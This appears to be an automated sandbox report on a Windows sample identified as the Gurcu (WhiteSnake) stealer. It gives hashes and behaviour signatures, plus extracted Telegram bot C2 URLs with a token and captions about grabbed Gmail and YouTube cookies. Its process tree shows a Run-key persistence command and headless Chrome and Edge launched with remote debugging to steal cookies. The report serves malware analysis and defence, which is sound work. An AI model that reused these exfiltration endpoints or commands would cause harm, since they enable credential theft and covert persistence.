Analysis

  • max time kernel
    105s
  • max time network
    121s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    06/04/2025, 19:40

General

  • Target

    generated30.exe

  • Size

    938KB

  • MD5

    2517b502d7714a4e384044a0b6c2a157

  • SHA1

    aa974d57b3b42a1a72afbe2520ae7333e35d7531

  • SHA256

    66fc943f11f465b81234c1fd1a9dfecb87082fe2560a0b1865c2679a927c76c0

  • SHA512

    f3a87225fecced58e540bab65087e45f7340307b77673e566e7074354cf3f4668815ce56bf5f04fc6dba847a0330fc89cc7c8a4ca48d2b725e39a564f4ae46aa

  • SSDEEP

    24576:q7DB0lkqjVnlqud+/2P+A0+lyv0PTVbUkIaMUcfL8lNsO:q7F0lkqXfd+/9AHly8Pv6Ucz8

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendMessage?chat_id=6565043849

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendDocument?chat_id=6565043849&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgmail.com%20youtube.com%20%5D%20were%20successfully%20grabbed%20from%20the%20Default%20profile%20of%20Chrom

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendDocument?chat_id=6565043849&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgmail.com%20youtube.com%20%5D%20were%20successfully%20grabbed%20from%20the%20Default%20profile%20of%20Microsoft%20Edg

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/getUpdates?offset=-

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Uses browser remote debugging 2 TTPs 19 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\generated30.exe
    "C:\Users\Admin\AppData\Local\Temp\generated30.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1368
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7A31.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7A31.tmp.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:6012
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:4208
        • C:\Windows\system32\tasklist.exe
          Tasklist /fi "PID eq 1368"
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4384
        • C:\Windows\system32\find.exe
          find ":"
          3⤵
            PID:1092
          • C:\Windows\system32\timeout.exe
            Timeout /T 1 /Nobreak
            3⤵
            • Delays execution with timeout.exe
            PID:4640
          • C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe
            "C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3496
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdater /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe /f
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4860
              • C:\Windows\system32\reg.exe
                reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdater /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe /f
                5⤵
                • Adds Run key to start application
                • Modifies registry key
                PID:4900
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --no-sandbox --disable-gpu
              4⤵
              • Uses browser remote debugging
              • Checks processor information in registry
              • Enumerates system info in registry
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:5080
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x230,0x234,0x238,0x8c,0x23c,0x7ffcf7b3dcf8,0x7ffcf7b3dd04,0x7ffcf7b3dd10
                5⤵
                  PID:5008
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1968,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1716 /prefetch:2
                  5⤵
                    PID:4068
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2100,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2096 /prefetch:3
                    5⤵
                      PID:5448
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2496,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2508 /prefetch:8
                      5⤵
                        PID:1972
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2900,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2896 /prefetch:1
                        5⤵
                        • Uses browser remote debugging
                        PID:1328
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2936,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2920 /prefetch:1
                        5⤵
                        • Uses browser remote debugging
                        PID:3532
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3792,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3796 /prefetch:2
                        5⤵
                        • Uses browser remote debugging
                        PID:5204
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4024,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4060 /prefetch:1
                        5⤵
                        • Uses browser remote debugging
                        PID:3656
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4596,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4636 /prefetch:8
                        5⤵
                          PID:2452
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4744,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4740 /prefetch:8
                          5⤵
                            PID:6100
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4732,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4748 /prefetch:8
                            5⤵
                              PID:780
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4736,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4932 /prefetch:8
                              5⤵
                                PID:236
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4968,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4964 /prefetch:8
                                5⤵
                                  PID:732
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4760,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4648 /prefetch:8
                                  5⤵
                                    PID:1592
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4672,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4960 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:3880
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4984,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4976 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:1912
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5224,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5220 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:5312
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4028,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2884 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:1152
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5024,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5460 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:4080
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5252,i,13766868308220267197,15871443691180480463,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4792 /prefetch:8
                                    5⤵
                                      PID:3196
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --no-sandbox --disable-gpu
                                    4⤵
                                    • Uses browser remote debugging
                                    • Drops file in Windows directory
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    • Modifies data under HKEY_USERS
                                    • Modifies registry class
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of WriteProcessMemory
                                    PID:4656
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x268,0x26c,0x270,0x264,0x30c,0x7ffcf790f208,0x7ffcf790f214,0x7ffcf790f220
                                      5⤵
                                        PID:4424
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2176,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:2
                                        5⤵
                                          PID:5996
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2268,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
                                          5⤵
                                            PID:1340
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2984,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2976 /prefetch:8
                                            5⤵
                                              PID:3644
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3220,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3216 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:4192
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3452,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:5256
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4648,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:4352
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4700,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4696 /prefetch:1
                                              5⤵
                                              • Uses browser remote debugging
                                              PID:5104
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4816,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4812 /prefetch:8
                                              5⤵
                                                PID:4824
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4772,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:8
                                                5⤵
                                                  PID:2448
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4956,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4948 /prefetch:8
                                                  5⤵
                                                    PID:3820
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5000,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:8
                                                    5⤵
                                                      PID:652
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5000,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:8
                                                      5⤵
                                                        PID:2348
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5528,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:8
                                                        5⤵
                                                          PID:716
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5592,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5612 /prefetch:8
                                                          5⤵
                                                            PID:812
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=5764,i,14502615211284184626,4788665331546437680,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:1
                                                            5⤵
                                                            • Uses browser remote debugging
                                                            PID:1184
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
